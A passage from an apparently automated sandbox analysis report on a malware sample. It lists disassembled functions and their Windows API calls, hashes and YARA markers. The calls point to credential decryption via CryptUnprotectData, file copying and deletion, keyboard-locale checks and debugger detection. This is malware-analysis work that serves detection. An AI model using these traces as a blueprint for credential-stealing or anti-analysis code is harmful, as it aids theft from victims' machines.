                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID: \*.*$@
                                            • API String ID: 433455689-2355794846
                                            • Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                            • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                            • Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                            • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                            Function 02451977 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 02451BCA
                                            • StrCmpCA.SHLWAPI(?,00425394), ref: 02451C1A
                                            • StrCmpCA.SHLWAPI(?,0042543C), ref: 02451C30
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02451FE7
                                            • DeleteFileA.KERNEL32(00000000), ref: 02452071
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 024520C7
                                            • FindClose.KERNEL32(000000FF), ref: 024520D9
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 1415058207-0
                                            • Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                            • Instruction ID: fb6762137e67ab75871f9d9920a7fa937a5d51d28300076428a3dd46fda5c188
                                            • Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                            • Instruction Fuzzy Hash: FE12BF71940A28ABCB19EB61DC58EFD737AAF54301F4045EE954A72090EF746F88CF52
                                            Function 0245E177 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 0245E1C5
                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0245E215
                                            • StrCmpCA.SHLWAPI(?,004215C4), ref: 0245E22B
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245E747
                                            • FindClose.KERNEL32(000000FF), ref: 0245E759
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2325840235-0
                                            • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction ID: 0e764f17be525e01d6066945d124aec541d60ec13ae93f28aad384293f25b851
                                            • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                            • Instruction Fuzzy Hash: F1F1AD71954638AACB19EB61DC98EFE733AAF54301F8045EF945A72090EF305F89CE52
                                            Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                            • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID: /
                                            • API String ID: 3090951853-4001269591
                                            • Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                            • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                            • Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                            • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                            Function 0040C920 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040C953
                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009C94A0), ref: 0040C971
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                            • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                            • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                            • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                            • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                            Function 0245CB87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0245CBBA
                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0245CBD8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0245CBE3
                                            • memcpy.MSVCRT(?,?,?), ref: 0245CC79
                                            • lstrcat.KERNEL32(?,00420B47), ref: 0245CCAA
                                            • lstrcat.KERNEL32(?,00420B4B), ref: 0245CCBE
                                            • lstrcat.KERNEL32(?,00420B4E), ref: 0245CCDF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction ID: 9bbec915eddda620fc75c9821f384963f851641bbd6eae93e830813529f1a165
                                            • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                            • Instruction Fuzzy Hash: 59415FB4D04229EBDB10CFA0DD88BEEB7B9BB44304F1045AAF509A7280D7745B84CF91
                                            Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                            • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID: eM
                                            • API String ID: 2579439406-4107679315
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                            Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                            • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID: >O@
                                            • API String ID: 4291131564-3498640338
                                            • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                            • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                            • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                            Function 024BED3D Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: \u$\u${${$}$}
                                            • API String ID: 0-582841131
                                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction ID: 7504d442168cb941241940cf30905d0fd8524054b9c43a1a3babdc831899bf7c
                                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                            • Instruction Fuzzy Hash: B7416D26E19BD9C5CB068B7444A02EEBFB22FE6110F9D429FC49D1F382C774414AD3A5
                                            Function 02467F87 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 02467FD8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 02467FF0
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 02468004
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02468059
                                            • LocalFree.KERNEL32(00000000), ref: 02468119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID:
                                            • API String ID: 3090951853-0
                                            • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction ID: 8064c9af3c8b144dc22e7ddf1c236f71e3ec2f536c9cd51d4642dcea157b7c3a
                                            • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                            • Instruction Fuzzy Hash: 24412A71941228ABCB24DB94DC9CBFEB375FB48704F20419AE10AB2190DB746F89CF52
                                            Function 0246B8A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0246C109
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0246C11E
                                            • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0246C129
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0246C145
                                            • TerminateProcess.KERNEL32(00000000), ref: 0246C14C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction ID: 77dba52a2fda7468963fb340ce905291a87ee1d9ce9721bd360c0010ff1d9b72
                                            • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                            • Instruction Fuzzy Hash: 4021B2B8502314DFD710DF59F8896983BB4FB08314F52807BE91897261D7B195858F5D
                                            Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 3657800372-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                            Function 02457507 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02457514
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0245751B
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02457548
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0245756B
                                            • LocalFree.KERNEL32(?), ref: 02457575
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 2609814428-0
                                            • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction ID: 612e82f5369b8bf6116c9877e92105de6408e8223a6c39826673b6d9394fc82a
                                            • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                            • Instruction Fuzzy Hash: F1010CB5A45308BBDB10DFE8DC46F9EB779AB44B04F108556FB05AA2C0D7B0AB40CB65
                                            Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                            • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                            Function 024699F7 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469A15
                                            • Process32First.KERNEL32(00420ACE,00000128), ref: 02469A29
                                            • Process32Next.KERNEL32(00420ACE,00000128), ref: 02469A3E
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 02469A53
                                            • CloseHandle.KERNEL32(00420ACE), ref: 02469A71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction ID: c486a9d1a5435bf4b37cac732c947d78c37bf520afce1f75811ca21ab426ae03
                                            • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                            • Instruction Fuzzy Hash: 17011E75A05248EBCB20DFA4CD88BEEB7F9BB08700F10418AF50997240EB719B40CF52
                                            Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: ,<A
                                            • API String ID: 123533781-3158208111
                                            • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                            • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                            • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                            Function 0245E797 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 0245E809
                                            • StrCmpCA.SHLWAPI(?,004215F0), ref: 0245E859
                                            • StrCmpCA.SHLWAPI(?,004215F4), ref: 0245E86F
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245EF46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
